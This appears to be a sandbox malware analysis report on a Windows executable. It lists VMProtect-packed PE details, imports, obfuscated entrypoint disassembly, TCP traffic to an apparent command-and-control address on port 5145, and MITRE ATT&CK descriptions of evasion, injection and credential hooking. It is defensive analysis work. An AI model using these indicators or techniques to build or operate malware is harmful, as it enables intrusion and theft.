Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65EC8566 [Sat Mar 9 15:51:02 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	759a583e26c79230c2c829f7f86ebec2

Entrypoint Preview

Instruction
jmp 00007FF854EEDBCAh
jl 00007FF854EEDC3Bh
pop es
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
pushad
outsd
add dword ptr [eax], eax
jmp 00007FF854F0E8E5h
jp 00007FF854EEDBCDh
xchg eax, esi
add byte ptr [ebp+02467EF9h], FFFFFFB2h
add dl, ch
dec al
cmp si, dx
xor al, 4Ch
xor bl, al
clc
cmp dh, 00000007h
dec eax
mov eax, dword ptr [esp+eax]
dec eax
sub ebp, 00000008h
dec eax
mov dword ptr [ebp+00h], eax
ror al, FFFFFF84h
bt eax, 11h
dec eax
sub esi, 00000004h
mov eax, dword ptr [esi]
xor eax, ebx
jmp 00007FF854EF9387h
dec eax
mov ecx, dword ptr [ebp+00h]
movzx ax, byte ptr [ecx]
clc
dec esp
cmp eax, ebx
dec eax
add ebp, 00000006h
clc
inc ecx
cmp dl, 0000000Fh
mov word ptr [ebp+00h], ax
bswap ax
inc ecx
add al, cl
dec eax
sub esi, 00000004h
and ah, FFFFFF92h
mov eax, dword ptr [esi]
test ax, 000042B7h
inc eax
test ah, dl
xor eax, ebx
not eax
jmp 00007FF854F577D4h
push edx
shl edi, cl
pop ecx
inc edi
mov ebx, 2FBDD11Bh
xchg eax, edi
rcl dword ptr [eax+50h], 1
mov dword ptr [7098740Bh], eax
push cs
popfd
sbb dword ptr [esi-522F5662h], eax
jmp 00007FF8535120CCh
cdq
shl bh, 1
lodsb
sbb al, byte ptr [edx+edi*4]
mov al, byte ptr [A4129117h]
in eax, dx
movsd
outsd
inc esp
jmp 00007FF854EEDBDDh

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729
[IMP] VS2005 build 50727

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x494408	0xc4f	.vmp1
IMAGE_DIRECTORY_ENTRY_IMPORT	0x446a60	0x258	.vmp1
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x810000	0x1d5	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x8082a0	0x5f88	.vmp1
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x80f000	0x134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x440dd0	0x28	.vmp1
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x808160	0x140	.vmp1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x46f000	0x260	.vmp1
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4afcf	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x4c000	0xf14c	0xf200	9f3f8d3284d7dd4853a00c0fcd0557ad	False	0.6731178977272727	data	6.80611112393545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x5c000	0x10b8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x5e000	0x315c	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.vmp0	0x62000	0x3cc60e	0x0	d41d8cd98f00b204e9800998ecf8427e	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp1	0x42f000	0x3df228	0x3df400	6acd7a8991ed41ec0b72690df6aec7ab	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x80f000	0x134	0x200	ba4a2a1210ffd02b22cef531046367e1	False	0.5078125	data	3.5768741610740182	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x810000	0x1d5	0x200	5bfe3ab15db93f584d2b58582a2c5b2e	False	0.5234375	data	4.701503258251789	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x810058	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
KERNEL32.dll	GetCurrentProcess
USER32.dll	GetWindowThreadProcessId
GDI32.dll	GetObjectA
ADVAPI32.dll	GetTokenInformation
SHELL32.dll	ShellExecuteA
MSVCP140.dll	??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z
IMM32.dll	ImmReleaseContext
dwmapi.dll	DwmExtendFrameIntoClientArea
d3d9.dll	Direct3DCreate9Ex
WS2_32.dll	send
WINMM.dll	PlaySoundA
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	memmove
api-ms-win-crt-runtime-l1-1-0.dll	_initialize_narrow_environment
api-ms-win-crt-stdio-l1-1-0.dll	fgetc
api-ms-win-crt-string-l1-1-0.dll	strncpy
api-ms-win-crt-utility-l1-1-0.dll	qsort
api-ms-win-crt-heap-l1-1-0.dll	_callnewh
api-ms-win-crt-convert-l1-1-0.dll	atof
api-ms-win-crt-filesystem-l1-1-0.dll	_unlock_file
api-ms-win-crt-time-l1-1-0.dll	_time64
api-ms-win-crt-math-l1-1-0.dll	ceilf
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale
WTSAPI32.dll	WTSSendMessageW
KERNEL32.dll	GetCurrentProcess
USER32.dll	CharUpperBuffW
ADVAPI32.dll	RegQueryValueExA
KERNEL32.dll	LocalAlloc, GetCurrentProcess, GetCurrentThread, LocalFree, GetModuleFileNameW, GetProcessAffinityMask, SetProcessAffinityMask, SetThreadAffinityMask, Sleep, ExitProcess, GetLastError, FreeLibrary, LoadLibraryA, GetModuleHandleA, GetProcAddress
ADVAPI32.dll	OpenSCManagerW, EnumServicesStatusExW, OpenServiceW, QueryServiceConfigW, CloseServiceHandle

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 21:53:07.783801079 CEST	49704	5145	192.168.2.5	185.204.109.14
Jul 25, 2024 21:53:07.788785934 CEST	5145	49704	185.204.109.14	192.168.2.5
Jul 25, 2024 21:53:07.788914919 CEST	49704	5145	192.168.2.5	185.204.109.14
Jul 25, 2024 21:53:07.793020010 CEST	49704	5145	192.168.2.5	185.204.109.14
Jul 25, 2024 21:53:07.798160076 CEST	5145	49704	185.204.109.14	192.168.2.5
Jul 25, 2024 21:53:08.648001909 CEST	49704	5145	192.168.2.5	185.204.109.14

Target ID:	0
Start time:	15:53:04
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\LisectAVT_2403002A_290.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\LisectAVT_2403002A_290.exe"
Imagebase:	0x7ff7fe2e0000
File size:	4'124'168 bytes
MD5 hash:	1A23985DADC6831A82E0595728023980
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:53:04
Start date:	25/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002A_290.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: LisectAVT_2403002A_290.exePID: 3380, Parent PID: 1028

Windows Analysis Report
LisectAVT_2403002A_290.exe